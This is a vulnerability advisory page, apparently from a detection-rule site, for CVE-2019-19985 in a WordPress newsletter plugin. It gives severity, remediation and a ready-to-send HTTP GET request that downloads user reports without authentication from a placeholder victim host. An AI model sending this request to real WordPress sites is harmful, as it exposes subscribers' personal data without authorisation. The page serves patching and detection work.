🔙 목록으로 돌아가기

CVE-2019-19985: WordPress Email Subscribers & Newsletters <4.2.3 - Arbitrary File Retrieval

TitleWordPress Email Subscribers & Newsletters <4.2.3 - Arbitrary File Retrieval
AuthorKBA@SOGETI_ESEC,madrobot,dwisiswant0
SeverityMedium
ImpactAn attacker can access sensitive files on the server, potentially leading to unauthorized access or data leakage.
RemediationUpdate to the latest version of WordPress Email Subscribers & Newsletters plugin (4.2.3) or apply the patch provided by the vendor.
CVSS Score5.3
EPSS Score0.86715
CVE IDCVE-2019-19985
CWE IDCWE-862
Tags cve cve2019 wordpress wp-plugin edb packetstorm icegram vkev vuln

🔍 Vulnerability Description

WordPress Email Subscribers & Newsletters plugin before 4.2.3 is susceptible to arbitrary file retrieval via a flaw that allows unauthenticated file download and user information disclosure. An attacker can obtain sensitive information, modify data, and/or execute unauthorized administrative operations.

🌐 HTTP Request

GET /wp-admin/admin.php?page=download_report&report=users&status=all HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Fedora; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2019/CVE-2019-19985.yaml

🦈 Packet Capture: ⬇️ Download cve-2019-19985.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A